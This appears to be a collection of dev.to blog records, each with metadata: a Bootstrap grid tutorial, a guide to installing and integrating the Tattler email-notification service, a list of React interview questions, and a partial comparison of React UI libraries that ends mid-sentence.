1,908,795
Bootstrap Tutorials: Grid system
Grid system Bootstrap grid is a powerful system for building mobile-first websites. It...
27,869
2024-07-02T15:00:00
https://dev.to/keepcoding/bootstrap-tutorials-grid-system-4ka7
bootstrap, learning, grid, design
## Grid system Bootstrap grid is a powerful system for building mobile-first websites. It uses a series of containers, rows, and columns to layout and align content. It’s built with flexbox and is fully responsive. Some people even think that grid is the most important reason to use Bootstrap, so in this lesson, we will get to know this incredibly useful tool in depth. ## Container Bootstrap grid needs a container to work properly. We learned about containers in the previous lesson, so we won't dwell on them here. In our current project, we have already added a container and it looks like this: **HTML** ``` <div class="container" style="height: 500px; background-color: red"> </div> ``` And this is what the container should look like when rendered in our browser: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qt2l3a7fmxp3ygw8lep2.png) ## Row Next, we need a row. Rows are wrappers for columns. If you want to split your layout horizontally, use .row. Let's add 2 rows to our container: **HTML** ``` <div class="container" style="height: 500px; background-color: red"> <div class="row" style="background-color: blue;"> I am a first row </div> <div class="row" style="background-color: lightblue;"> I am a second row </div> </div> ``` _**Note:** Again, for demonstration purposes, we're adding inline CSS (background colors) to help us visually see the changes we're going to make to our design._ After saving the file and refreshing your browser, you should see 2 new rows. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/we8j0j713jfn1aj43qq4.png) ## Columns Then it's time for the columns. Bootstrap grid allows you to add up to 12 columns in one line. If you add more than 12, the excess column will jump to the next line. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yaqvkaluvubl5uz22crb.png) **HTML** ``` <div class="container"> <div class="row"> <div class="col"> 1 </div> <div class="col"> 2 </div> <div class="col"> 3 </div> <div class="col"> 4 </div> <div class="col"> 5 </div> <div class="col"> 6 </div> <div class="col"> 7 </div> <div class="col"> 8 </div> <div class="col"> 9 </div> <div class="col"> 10 </div> <div class="col"> 11 </div> <div class="col"> 12 </div> </div> </div> ``` _**Remember:** for the grid to work properly, you should always place columns in rows, and rows in containers._ Columns are incredibly flexible. You can define how wide each column should be and how each of them should behave on different screen widths. Thanks to this, you can easily adjust your layout for both mobile devices and desktops. For example, if you want to insert 2 columns of equal width, you can use the following code: **HTML** ``` <div class="container"> <div class="row"> <div class="col-6">First column</div> <div class="col-6">Second column</div> </div> </div> ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/o224d8usj3bwuqjl2yev.png) As you can see, we've added the digits 6 to the col class. This (col-6 class) means that we want each column to be 6 units wide. You can freely set the width of the columns, just remember that the sum of their width units **does not exceed 12**. col-6 + col-6 together give 12 units, which means 2 identical columns. If you would like the right column to be slightly larger than the left column, you can set it as follows: **HTML** ``` <div class="container"> <div class="row"> <div class="col-4">First column</div> <div class="col-8">Second column</div> </div> </div> ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ww5zpv4k9zbik8fvgpo2.png) 4 (col-4) + 8 (col-8) = 12 This way you've created a very typical layout with the main column on the right and the sidebar space on the left - that's exactly the scheme this tutorial uses! **However, there is one problem with the above example** - no matter the screen size, our columns remain in the same aspect ratio. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/v9a6nsvgehoj2hvjvv70.png) The 4/8 ratio is very useful on large screens where there is plenty of space. However, on mobile devices, dividing a small screen additionally into 2 parts of 4 and 8 units is not acceptable. It would not be comfortable to use such a layout. **Here again, breakpoints come to the rescue.** Do you remember the definition below from our previous lesson? _**Breakpoints** are the triggers in Bootstrap for how your layout responsive changes across device or viewport sizes._ As in containers, we can also use breakpoints in columns and define from what width we want the column to extend to full width. Taking the example from earlier, let's say we want both of our columns to be **full-width** on small and medium screens, and to change to a **4/8 ratio** on large screens. **HTML** ``` <div class="container"> <div class="row"> <div class="col-md-4">First column</div> <div class="col-md-8">Second column</div> </div> </div> ``` All we have to do is add a breakpoint -md (meaning "medium screen size") to the col class, so that the Bootstrap grid knows that we want 4/8 columns ratio only on screens bigger than medium size, and on other screens (medium and small size) the columns should be stretched to full width. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0j9zrpbhm78rm0m55lmz.gif) **To sum up** - by using class col-md-4, we tell grid the following command: - On screens **smaller than 768px**, I want this column to stretch to full width - On screens **larger than 768px**, I want this column to be 4 units wide Take a look at the table below and see what breakpoints you can use when creating a layout: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rx3l26qyiu88uzh3nzh8.png) Okay, enough of this theory. Now let's work on some real life examples. **Three equal columns** Get three equal-width columns starting at desktops and scaling to large desktops. On mobile devices, tablets and below, the columns will automatically stack. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6drnl663n6ly799t4ysn.png) **HTML** ``` <div class="container"> <div class="row"> <div class="col-md-4">.col-md-4</div> <div class="col-md-4">.col-md-4</div> <div class="col-md-4">.col-md-4</div> </div> </div> ``` **Three unequal columns** Get three columns starting at desktops and scaling to large desktops of various widths. Remember, grid columns should add up to twelve for a single horizontal block. More than that, and columns start stacking no matter the viewport. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wbfb90twet4xvu81qhd2.png) **HTML** ``` <div class="container"> <div class="row"> <div class="col-md-3">.col-md-3</div> <div class="col-md-6">.col-md-6</div> <div class="col-md-3">.col-md-3</div> </div> </div> ``` **Two columns with two nested columns** Nesting is easy—just put a row of columns within an existing column. This gives you two columns starting at desktops and scaling to large desktops, with another two (equal widths) within the larger column. At mobile device sizes, tablets and down, these columns and their nested columns will stack. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/prwc30j43mqbmrnaz9ox.png) **HTML** ``` <div class="container"> <!-- Outer row --> <div class="row"> <div class="col-md-8"> .col-md-8 <!-- Inner row --> <div class="row"> <div class="col-md-6">.col-md-6</div> <div class="col-md-6">.col-md-6</div> </div> </div> <div class="col-md-4">.col-md-4</div> </div> </div> ``` I think you now have a rough idea of how it works. Bootstrap grid is a very advanced tool and at first its use can be overwhelming. If you feel that not everything is clear to you - **that's completely normal and fine**. It just takes practice. You will gain confidence and fluency over time. It's been a long lesson, but don't hesitate to repeat it to yourself to consolidate your knowledge. If you want to practice on your own and have a look at more examples read the **[grid system documentation page](https://mdbootstrap.com/docs/standard/layout/grid/)** or play with our **[grid generator](https://mdbootstrap.com/docs/standard/tools/builders/grid/)**. **[Demo & source code for this lesson](https://mdbootstrap.com/snippets/standard/ascensus/4609158)**
keepcoding
1,909,054
The right way to email your users
Overcome common issues when email users from your web application, using open-source notification system Tattler. A tutorial from zero to integrated.
0
2024-07-02T14:53:50
https://dev.to/mmic/the-right-way-to-email-your-users-2pnn
notifications, email, sms, python
--- title: The right way to email your users published: true description: Overcome common issues when email users from your web application, using open-source notification system Tattler. A tutorial from zero to integrated. tags: notifications, email, sms, python # cover_image: https://tattler.dev/images/logo/logo-dark.png # Use a ratio of 100:42 for best results. # published_at: 2024-06-14 13:32 +0000 --- When you build a web application you need to email your users for password resets, orders placed and the like. A trivial task, it seems. Here's a one-liner in django: ```python from django.core.mail import send_mail send_mail("Password changed!", f"Hey {request.user.first_name}!\n\nYour password changed...", "support@yourservice.com", [request.user.email], fail_silently=False) ``` # Reality kicks in A one-liner. Problem solved, now moving on. But soon after, issues arise: 1. You want to include some special characters like '🙂' or 'schön'. The one-liner no longer works. 1. You need some conditional text for paying users. Which requires some **templating** logic. 1. Some users fail to receive your notifications because their **spam filter** distrusts your bare-bones emails. Figure out what they need and build it. 1. You want **branded** emails with your logo and stationery. You need to build complex MIME/multipart assemblies. 1. You need to **prevent delivery** to actual users during development from your dev environment. You need environment-specific logic. You can surely address each hurdle. Your one-liner grows into 10, 100, 1000 lines of code. It may grow organically, adapted at every notification-sending point. Or structured - and get you to build your own DIY notification framework. # Notification system You *may* build your DIY notification system, experiencing and overcoming a problem after the other. But why go through the pain if the work is already done? [Tattler](https://tattler.dev) solves all the problems above and more. It's a lightweight service you deploy within minutes, and your notification one-liners stay a one-liner: ```python from tattler.client.tattler_py import send_notification # trigger notification in Python code send_notification('website', 'password_changed', request.user.email) ``` You can call tattler from any language and tech stack -- with one call to its REST API: ```bash # trigger notification via REST API in any language curl -XPOST http://localhost:11503/notification/website/password_changed?user=foo@bar.com ``` Notification templates look like this: ```jinja Hey {{ user_firstname }}! 👋🏻 A quick heads up that your password was changed. If it was you, all good. If it wasn't, reply to this email without delay. {% if user_account_type == 'premium' %} P.S.: Thank you for supporting us with your premium account! 🤩 {% endif %} ``` # Deploying tattler Install Tattler into an own folder `~/tattler_quickstart`, with this structure: ``` ~/tattler_quickstart/ ├── conf/ # configuration files ├── templates/ # templates for notifications └── venv/ # python virtual environment holding the code ``` Here's a terminal session performing the steps in this guide: {% embed http://asciinema.org/a/666512 %} ## Installation Create this directory structure: ```bash # create the directory structure above mkdir -p ~/tattler_quickstart cd ~/tattler_quickstart mkdir conf templates # create and load a virtualenv to install into python3 -m venv ~/tattler_quickstart/venv . ~/tattler_quickstart/venv/bin/activate # install tattler into it pip install tattler ``` ## Configuration Tattler's configuration is organized in a bunch of files (envdir), whose filename is the configuration key and content its value. We'll configure the following: ``` ~/tattler_quickstart/ └── conf/ ├── TATTLER_MASTER_MODE # actually deliver notifications ├── TATTLER_SMTP_ADDRESS # IP:port of the SMTP server └── TATTLER_SMTP_AUTH # username:password SMTP credentials ``` Let's do it: ```bash cd ~/tattler_quickstart/conf echo 'production' > TATTLER_MASTER_MODE # replace with your SMTP server echo '127.0.0.1:25' > TATTLER_SMTP_ADDRESS echo 'username:password' > TATTLER_SMTP_AUTH chmod 400 TATTLER_SMTP_AUTH ``` # Running tattler At this point tattler is ready to run, so let's! ```bash # run this from the terminal where you loaded your virtual environment envdir ~/tattler_quickstart/conf tattler_server ``` And tattler will confirm: ``` INFO:tattler.server.pluginloader:Loading plugin PassThroughAddressbookPlugin (<class 'passthrough_addressbook_tattler_plugin.PassThroughAddressbookPlugin'>) from module passthrough_addressbook_tattler_plugin INFO:tattler.server.tattlersrv_http:Using templates from /../tattler_quickstart/templates INFO:tattler.server.tattlersrv_http:==> Meet tattler @ https://tattler.dev . If you like tattler, consider posting about it! ;-) WARNING:tattler.server.tattlersrv_http:Tattler enterprise now serving at 127.0.0.1:11503 ``` Done! ✅ ## Sending a test notification Ask tattler to send a test notification with the `tattler_notify` command: ```bash # [ recipient ] [ scope ] [ event ] [ do send! ] tattler_notify my@email.com demoscope demoevent -m production ``` This sends a demo notification embedded in tattler, so you don't need to write your own content. `-m production` tells tattler to deliver to the actual recipient `my@email.com`. Without it, tattler will safely operate in development mode and divert any delivery to a development address (configured in `TATTLER_DEBUG_RECIPIENT_EMAIL`) so real users aren’t accidentally sent emails during development. Proceed to your mailbox to find the result. If nothing is in, check the logs of `tattler_server`. They should look like this: ``` [...] INFO:tattler.server.sendable.vector_email:SMTP delivery to 127.0.0.1:25 completed successfully. INFO:tattler.server.tattlersrv_http:Notification sent. [{'id': 'email:b386e396-7ad4-4d50-bc2c-1406bf6a8814', 'vector': 'email', 'resultCode': 0, 'result': 'success', 'detail': 'OK'}] ``` If they don't, you'll see an error description. Most likely your SMTP server is misconfigured, so check again [Configuration](#configuration) and restart `tattler_server` when fixed. Next, you'll want to write your own content to notify users. # Templates Write your own template to define what content to send upon an event like "password_changed". Templates are folders organized in this directory structure: ``` ~/tattler_quickstart/ └── templates/ # base directory holding all notification templates └── website/ # an arbitrary 'scope' (ignore for now) ├── password_changed/ # template to send when user changes password ├── order_placed/ # template to send when user places an order └── ... ``` What does the content of the event template itself look like? ``` password_changed/ # arbitrary event name for the template └── email/ ├── body.html # template to expand for the HTML body ├── body.txt # template to expand for the plain text body └── subject.txt # template to expand for the subject ``` Let's proceed to create the directories for one: ```bash cd ~/tattler_quickstart mkdir -p templates/password_changed/email ``` ## Plain text template Now, edit file `email/body.txt` with the content of the plain text email. This is seen by users of webmails or email applications that lack support for HTML emails. ```jinja {# file email/body.txt (this is a comment) #} Hey {{ user_firstname }}! 👋🏻 A quick heads up that your password was changed. If it was you, all good. If it wasn't, reply to this email without delay. {% if user_account_type == 'premium' %} P.S.: Thank you for supporting us with your premium account! 🤩 {% endif %} ``` ## Subject Next, edit file `email/subject.txt` with the subject of the email: ```jinja Warning: password changed for account {{ user_email }}! ⚠️ ``` Notice that the subject supports both non-ASCII characters and templating too! 😎 ## HTML template Then, edit file `email/body.html` with HTML content. Here's where you implement your company's stationery -- colors, logo, fonts, layout and all. Make sure to stick to HTML constructs supported by email clients! That's MUCH less than your browser does. See [caniemail.com](https://caniemail.com) for help. ```jinja {# file email/body.html (this is a comment) #} <html> <head><title>Your password was changed!</title></head> <body> <h1>Dear {{ user_firstname }}! 👋🏻</h1> <p>A quick heads up that <strong>your password was changed</strong>!</p> <p>If it was you, all good. If it wasn't, reply to this email without delay.</p> {% if user_account_type == 'premium' %} <p style="color: darkgray">P.S.: Thank you for supporting us with your premium account! 🤩</p> {% endif %} </body> </html> ``` ## Send your template Now that you've got your own template, tell tattler to deliver it: ```bash # [ recipient ] [ scope ] [ event ] [ do send! ] tattler_notify my@email.com website password_changed -m production ``` Check your inbox and that's it! # Integration Now that tattler runs and you provisioned your template, how to have it sent from your code? Whenever your application wants to notify an event, like "password changed", you can fire it either: - From python via tattler's native client API. - From any other language via tattler's REST API. Let's look at some concrete examples. ## Python Tattler is written in python, so python developers can use its native python API: ```python from tattler.client.tattler_py import send_notification send_notification('website', 'password_changed', request.user.email) ``` ## REST API This works with any language and tech stack. Simply make a POST request to `127.0.0.1:80` ``` http://localhost:11503/notification/website/password_changed?user=foo@bar.com [ API base URL ] [scope] [event name] [ recipient ] ``` Notice the following: - Host `localhost` and TCP port `11503` - Base URL of the API = `http://localhost:11503/notification/` - POST request (not GET)! - `website` is the scope name (see [Templates](#templates)) - `password_changed` is the template name (see [Templates](#templates)) - `user=foo@bar.com` tells tattler whom to send to Here’s how to leverage this from a number of programming languages. ## Go ```go package main import ( "bytes" "net/http" ) func main() { _, err := http.NewRequest("POST", "http://localhost:11503/notification/website/password_changed?user=my@email.com", bytes.NewBufferString("")) if err != nil { panic(err) } } ``` ## C# ```c# using System.Net.Http; public class Program { public static void Main(string[] args) { using var client = new HttpClient(); var response = await client.PostAsync("http://localhost:11503/notification/website/password_changed?user=my@email.com", null); } } ``` ## Java ```java import java.net.URI; import java.net.http.HttpClient; import java.net.http.HttpRequest; public class App { public static void main(String[] args) { HttpClient client = HttpClient.newHttpClient(); HttpRequest request = HttpRequest.newBuilder() .uri(new URI("http://localhost:11503/notification/website/password_changed?user=my@email.com")) .header("Content-Type", "application/json") .POST(HttpRequest.BodyPublishers.noBody()) .build(); HttpResponse<String> response = client.send(request, HttpResponse.BodyHandlers.ofString()); } } ``` ## Swift ```swift import Foundation let url = URL(string: "http://localhost:11503/notification/website/password_changed?user=my@email.com")! var request = URLRequest(url: url) request.httpMethod = "POST" request.setValue("application/json", forHTTPHeaderField: "Content-Type") request.httpBody = Data() let task = URLSession.shared.dataTask(with: request) { data, response, error in if let httpResponse = response as? HTTPURLResponse { print("Response Code: \(httpResponse.statusCode)") } } task.resume() ``` # Conclusion That's it. You installed and tested tattler within minutes, and integrated it into your code within a few more minutes. As your needs grow, tattler smoothly accommodates them without bloating your codebase. Advanced topics include passing variables to templates, sending SMS, having tattler plug-ins automatically retrieve user addresses or template variables. Find it all in [tattler's thorough documentation](https://docs.tattler.dev). Tattler is [proudly open-source](https://github.com/tattler-community/tattler-community), with a vastly liberal license (BSD) allowing commercial use. And if your company's policies require support and maintenance for every dependency, tattler offers them in an [enterprise subscription](https://tattler.dev/#enterprise), plus more features like S/MIME, multilingualism and delivery with Telegram and WhatsApp.
mmic
1,909,055
JavaScript
Top 20 React.JS interview questions. javascript react interview node As a React developer, it is...
0
2024-07-02T14:53:24
https://dev.to/mahadizulfiker/javascript-om8
javascript, webdev, beginners, programming
Top 20 React.JS interview questions. # javascript # react # interview # node As a React developer, it is important to have a solid understanding of the framework's key concepts and principles. With this in mind, I have put together a list of 20 important questions that every React developer should know, whether they are interviewing for a job or just looking to improve their skills. Before diving into the questions and answers, I suggest trying to answer each question on your own before looking at the answers provided. This will help you gauge your current level of understanding and identify areas that may need further improvement. Let's get started! 01. What is React and what are its benefits? Ans: React is a JavaScript library for building user interfaces. It is used for building web applications because it allows developers to create reusable UI components and manage the state of the application in an efficient and organized way. 02. What is the virtual DOM and how does it work? Ans: The Virtual DOM (Document Object Model) is a representation of the actual DOM in the browser. It enables React to update only the specific parts of a web page that need to change, instead of rewriting the entire page, leading to increased performance. When a component's state or props change, React will first create a new version of the Virtual DOM that reflects the updated state or props. It then compares this new version with the previous version to determine what has changed. Once the changes have been identified, React will then update the actual DOM with the minimum number of operations necessary to bring it in line with the new version of the Virtual DOM. This process is known as "reconciliation". The use of a Virtual DOM allows for more efficient updates because it reduces the amount of direct manipulation of the actual DOM, which can be a slow and resource-intensive process. By only updating the parts that have actually changed, React can improve the performance of an application, especially on slow devices or when dealing with large amounts of data. 03. How does React handle updates and rendering? Ans: React handles updates and rendering through a virtual DOM and component-based architecture. When a component's state or props change, React creates a new version of the virtual DOM that reflects the updated state or props, then compares it with the previous version to determine what has changed. React updates the actual DOM with the minimum number of operations necessary to bring it in line with the new version of the virtual DOM, a process called "reconciliation". React also uses a component-based architecture where each component has its own state and render method. It re-renders only the components that have actually changed. It does this efficiently and quickly, which is why React is known for its performance. 04. Explain the concept of Components in React? Ans: A React component is a JavaScript function or class that returns a React element, which describes the UI for a piece of the application. Components can accept inputs called "props", and manage their own state. 05. What is JSX and why is it used in React? Ans: JSX is a syntax extension for JavaScript that allows embedding HTML-like syntax in JavaScript. It is used in React to describe the UI, and is transpired to plain JavaScript by a build tool such as Babel. 06. What is the difference between state and props? Ans: State and props are both used to store data in a React component, but they serve different purposes and have different characteristics. Props (short for "properties") are a way to pass data from a parent component to a child component. They are read-only and cannot be modified by the child component. State, on the other hand, is an object that holds the data of a component that can change over time. It can be updated using the setState() method and is used to control the behavior and rendering of a component. 07. What is the difference between controlled and uncontrolled components in React? Ans: In React, controlled and uncontrolled components refer to the way that forms are handled. A controlled component is a component where the state of the form is controlled by React, and updates to the form's inputs are handled by event handlers. An uncontrolled component, on the other hand, relies on the default behavior of the browser to handle updates to the form's inputs. A controlled component is a component where the value of input fields is set by state and changes are managed by React's event handlers, this allows for better control over the form's behavior and validation, and it makes it easy to handle form submission. On the other hand, an uncontrolled component is a component where the value of the input fields is set by the default value attribute, and changes are managed by the browser's default behavior, this approach is less performant and it's harder to handle form submission and validation. 08. What is Redux and how does it work with React? Ans: Redux is a predictable state management library for JavaScript applications, often used with React. It provides a centralized store for the application's state, and uses pure functions called reducers to update the state in response to actions. In a React app, Redux is integrated with React via the react-redux library, which provides the connect function for connecting components to the Redux store and dispatching actions. The components can access the state from the store, and dispatch actions to update the state, via props provided by the connect function. 09. Can you explain the concept of Higher Order Components (HOC) in React? Ans: A Higher Order Component (HOC) in React is a function that takes a component and returns a new component with additional props. HOCs are used to reuse logic across multiple components, such as adding a common behavior or styling. HOCs are used by wrapping a component within the HOC, which returns a new component with the added props. The original component is passed as an argument to the HOC, and receives the additional props via destructuring. HOCs are pure functions, meaning they do not modify the original component, but return a new, enhanced component. For example, an HOC could be used to add authentication behavior to a component, such as checking if a user is logged in before rendering the component. The HOC would handle the logic for checking if the user is logged in, and pass a prop indicating the login status to the wrapped component. HOCs are a powerful pattern in React, allowing for code reuse and abstraction, while keeping the components modular and easy to maintain. 10. What is the difference between server-side rendering and client-side rendering in React? Ans: Server-side rendering (SSR) and client-side rendering (CSR) are two different ways of rendering a React application. In SSR, the initial HTML is generated on the server, and then sent to the client, where it is hydrated into a full React app. This results in a faster initial load time, as the HTML is already present on the page, and can be indexed by search engines. In CSR, the initial HTML is a minimal, empty document, and the React app is built and rendered entirely on the client. The client makes API calls to fetch the data required to render the UI. This results in a slower initial load time, but a more responsive and dynamic experience, as all the rendering is done on the client. 11. What are React Hooks and how do they work? Ans: React Hooks are a feature in React that allow functional components to have state and other lifecycle methods without using class components. They make it easier to reuse state and logic across multiple components, making code more concise and easier to read. Hooks include useState for adding state and useEffect for performing side effects in response to changes in state or props. They make it easier to write reusable, maintainable code. 12. How does React handle state management? Ans: React handles state management through its state object and setState() method. The state object is a data structure that stores values that change within a component and can be updated using the setState() method. The state updates trigger a re-render of the component, allowing it to display updated values dynamically. React updates the state in an asynchronous and batched manner, ensuring that multiple setState() calls are merged into a single update for better performance. 13. How do work useEffect hook in React? Ans: The useEffect hook in React allows developers to perform side effects such as data fetching, subscription, and setting up/cleaning up timers, in functional components. It runs after every render, including the first render, and after the render is committed to the screen. The useEffect hook takes two arguments - a function to run after every render and an array of dependencies that determines when the effect should be run. If the dependency array is empty or absent, the effect will run after every render. 14. Can you explain the concept of server-side rendering in React? Ans: Server-side rendering (SSR) in React is the process of rendering components on the server and sending fully rendered HTML to the browser. SSR improves the initial loading performance and SEO of a React app by providing a fully rendered HTML to the browser, reducing the amount of JavaScript that needs to be parsed and executed on the client, and improving the indexing of a web page by search engines. In SSR, the React components are rendered on the server and sent to the client as a fully formed HTML string, improving the initial load time and providing a more SEO-friendly web page. 15. How does React handle events and what are some common event handlers? Ans: React handles events through its event handling system, where event handlers are passed as props to the components. Event handlers are functions that are executed when a specific event occurs, such as a user clicking a button. Common event handlers in React include onClick, onChange, onSubmit, etc. The event handler receives an event object, which contains information about the event, such as the target element, the type of event, and any data associated with the event. React event handlers should be passed as props to the components, and the event handlers should be defined within the component or in a separate helper function. 16. Can you explain the concept of React context? Ans: React context is a way to share data between components without passing props down manually through every level of the component tree. The context is created with a provider and consumed by multiple components using the useContext hook. 17. How does React handle routing and what are some popular routing libraries for React? Ans: React handles routing by using React Router library, which provides routing capabilities to React applications. Some popular routing libraries for React include React Router, Reach Router, and Next.js. 18. What are some best practices for performance optimization in React? Ans: Best practices for performance optimization in React include using memoization, avoiding unnecessary re-renders, using lazy loading for components and images, and using the right data structures. 19. How does React handle testing and what are some popular testing frameworks for React? Ans: React handles testing using testing frameworks such as Jest, Mocha, and Enzyme. Jest is a popular testing framework for React applications, while Mocha and Enzyme are also widely used. 20. How do you handle asynchronous data loading in React? Ans: Asynchronous data loading in React can be handled using various methods such as the fetch API, Axios, or other network libraries. It can also be handled using the useState and useEffect hooks to trigger a state update when data is returned from the API call. It is important to handle loading and error states properly to provide a good user experience. In conclusion, this blog post covers the top 20 major questions that a React developer should know in 2023. The questions cover a wide range of topics from the basics of React, its benefits and architecture, to more advanced concepts such as JSX, state and props, controlled and uncontrolled components, Redux, Higher Order Components, and more. By trying to answer each question yourself before looking at the answers, you can gain a deeper understanding of the React framework and become a better React developer.
mahadizulfiker
1,909,051
Top 5 best UI libraries to Use in your Next Project
Introduction Are you looking to speed up your web development process? A UI library might...
0
2024-07-02T14:46:33
https://strapi.io/blog/top-5-best-ui-libraries-to-use-in-your-next-project
webdev, javascript, beginners, react
## Introduction Are you looking to speed up your web development process? A UI library might be just what you need! This article explores the top 5 modern UI libraries that can help you build stunning web applications quickly and efficiently. A UI library is a collection of pre-designed and pre-built user interface elements (such as Buttons, Menus, Lists, Dropdowns, etc.) used to build user interfaces for a web application in a unified design style. In a conventional web development workflow, you usually need a UI/UX designer to design the user interfaces before developing a web application. Although this is a good approach, it increases development costs and time. Not all developers can afford that. Here's where a UI library comes in. It can effectively address this issue by accelerating the web development process and ensuring a visually appealing and consistent design for your web application. ## What Makes The Best UI Libraries? Before we determine the top 5 best UI libraries, it's essential to establish clear criteria. This ensures that our selection process is fair, objective, and accountable, instilling confidence in the validity of our list. These are the criteria we are using to make this list. ### 1. It's A UI Library By the definition we wrote in the Introduction section, it's a UI library. Therefore, we won't include popular libraries like Bootstrap and Tailwindcss because they are more like a CSS framework than a UI Library. ### 2. Popularity & Community Support Popularity and community support are significant because the life of a UI library might depend on them. More popular UI libraries have more community support. We will measure this primarily by using Github stars and the number of search results on Google search. ### 3. Number of Components & Features This factor indicates the completeness of a UI library. More components & features are better. ### 4. How Easy to Use and Customize Each UI library comes with a documentation website and a customization API. We thoroughly reviewed these resources to assess how user-friendly and adaptable the libraries are, particularly for beginners. ### 5. Accessibility & Performance Accessibility and Performance make a UI library reliable for production-grade web applications. We measured this by testing the availability of keyboard navigation, WAI-ARIA patterns, and memory consumption of the same components across the tested UI libraries. ### 6. Developer reviews & experience A UI library exists to ease developer work. We measured this by our experience using all of them and developer reviews in online forums like Reddit, Stack Overflow, etc. ### 7. Updates and Development Activity No one wants to use an outdated library. As of this post, all UI libraries in the list are actively maintained. --- ### 1. Material UI - The Most Popular UI Library Material UI stands as the undisputed champion among UI Libraries built on top of React. It brings Google's Material Design to life with a comprehensive set of components, making it a reliable choice for your projects. When this article was written, Material UI was in version 5.15.19, with 60+ components, 92.4k GitHub stars, and almost 3k contributors. It is used by 1.2 million projects on Github, and the community support is huge. #### How to use Material UI + Examples You can install Material UI in your project by running: ```bash npm install @mui/material @emotion/react @emotion/styled ``` After that, you can directly use Material UI component in your project ```jsx import * as React from 'react'; import Button from '@mui/material/Button'; export default function ButtonUsage() { return <Button variant="contained">Hello world</Button>; } ``` The image below shows the example implementation of common UI components in Material UI. You can check the live demo and codes in Stackblitz. ![mui-examples](https://delicate-dawn-ac25646e6d.media.strapiapp.com/material_ui_2a0bffdf0f.jpg) [![Open in StackBlitz](https://developer.stackblitz.com/img/open_in_stackblitz.svg)](https://stackblitz.com/~/github.com/syakirurahman/mui-examples) #### Accessibility & Performance Material UI components follow WAI-ARIA specs and have standard keyword navigation. They are performant, efficient, and reliable for production-grade applications. While Material UI components are efficient and reliable, they do come with a large bundle size that can potentially impact page speed. However, this can be mitigated by optimizing the bundle size, a process you can learn more about here. #### Customization Material UI has ThemeProvider for basic customization like color palette, dark mode, typography, and breakpoints. Material UI uses CSS-in-JS library for styling. Every Material UI component has `sx` props for inline customization. You can also apply global styling to override the default style. You can visit [Material UI customization docs](https://mui.com/material-ui/customization/how-to-customize/) for more details about customization. #### Advantages & Disadvantages \+ Battle-tested UI library. \+ Huge community support. \+ Complete features. \+ Accessible. ± Good for large projects, but overkill for small projects. \- Material Design is overused. \- Customization is not developer friendly. ### 2. Ant Design - An Enterprise-class React UI library Ant Design, an open-source design system developed by Alibaba Group for enterprise-class web applications, is known for its simplicity, cleanliness, and elegant UI design. This straightforward design approach can help developers and designers feel at ease when working with the system. It is also built on top of React. Ant Design is on version 5.18.0 with 75 components, 90.9k GitHub stars, and 2.1k+ contributors when this article is written. It is used by around 605k projects on GitHub. #### How to use Ant Design + Examples You can install Ant Design by running this command: ```bash npm install antd --save ``` Then, you can use the components in your project ```jsx import React from 'react'; import { DatePicker } from 'antd'; const App = () => { return <DatePicker />; }; export default App; ``` The image below shows what Ant Design components look like. You can check the live demo and codes in Stackblitz. ![antd-examples](https://delicate-dawn-ac25646e6d.media.strapiapp.com/ant_design_38c62c9290.jpg) [![Open in StackBlitz](https://developer.stackblitz.com/img/open_in_stackblitz.svg)](https://stackblitz.com/~/github.com/syakirurahman/antd-examples) #### Accessibility & Performance Ant Design follows basic accessibility specs and supports keyboard navigation for its components. Ant Design components are designed to be clean, performant, and responsive for enterprise-class applications. Like Material UI, Ant Design uses CSS in JS and has a large bundle size. However, you can optimize it with [Tree-shaking](https://ant.design/docs/blog/tree-shaking). #### Customization Ant Design offers basic customization for theming but limited options for advanced customization. They didn't provide documentation for applying a custom style. To customize it, you must override the default style with global CSS. #### Advantages & Disadvantages \+ Battle-tested UI library. \+ Large community support. \+ Comprehensive components & features. \+ Clean and Elegant design. ± Good for medium-large projects, but overkill for small projects. \- Limited accessibility. \- Limited customization. ### 3. Mantine - A Fully Featured React UI Library Mantine is a React UI Library that provides great user and developer experiences. It launched in 2021 and is consistently updated with a new minor release almost monthly, accelerating its growth. Although Mantine is relatively new compared to Material UI and Ant Design, it offers more complete component collections. When this article was written, Mantine was on version 7.10.1 with 100+ components, 25.2k GitHub stars, and 531 contributors. #### How to use Mantine + Examples You can install Mantine by running: ```shell npm install @mantine/core @mantine/hooks ``` You also need to install `postcss`. ```shell= npm install --save-dev postcss postcss-preset-mantine postcss-simple-vars ``` Then, create `postcss.config.cjs` file in your project root folder. ```javascript module.exports = { plugins: { 'postcss-preset-mantine': {}, 'postcss-simple-vars': { variables: { 'mantine-breakpoint-xs': '36em', 'mantine-breakpoint-sm': '48em', 'mantine-breakpoint-md': '62em', 'mantine-breakpoint-lg': '75em', 'mantine-breakpoint-xl': '88em', }, }, }, }; ``` You also need to wrap your application with `MantineProvider` to be able to use Mantine components. ```jsx import { createTheme, MantineProvider } from '@mantine/core'; import '@mantine/core/styles.css'; // core styles are required for all packages const theme = createTheme({ /** Put your mantine theme override here */ }); function App() { return ( <MantineProvider theme={theme}> {/* Your app here */} </MantineProvider> ); } ``` Mantine also provides some starter templates for various frameworks. You can see more details about it in [its official documentation](https://mantine.dev/getting-started/). The image below is a screenshot of the Mantine components implementation. You can check the live demo and codes in Stackblitz. ![mantine-examples](https://delicate-dawn-ac25646e6d.media.strapiapp.com/mantine_3121f3ee78.jpg) [![Open in StackBlitz](https://developer.stackblitz.com/img/open_in_stackblitz.svg)](https://stackblitz.com/~/github.com/syakirurahman/mantine-examples) #### Accessibility & Performance Mantine follows WAI-ARIA standards and implements keyboard navigation in its components. Its components are designed with attention to detail and efficiently handle micro-interaction, making them convenient for users. Starting from version 7, Mantine uses CSS modules for styling, making it faster than the CSS-in-JS-based UI library. However, this approach also has drawbacks. `@mantine/core/styles.css` contains all the component styles. All the unused component styles will also be imported, making a larger bundle size. This problem can be solved by [manually importing individual component styles](https://mantine.dev/styles/mantine-styles/). #### Customization Mantine has a very developer-friendly documentation page that provides live customization for each component. You can customize Mantine components by passing new CSS modules or modifying component classes and 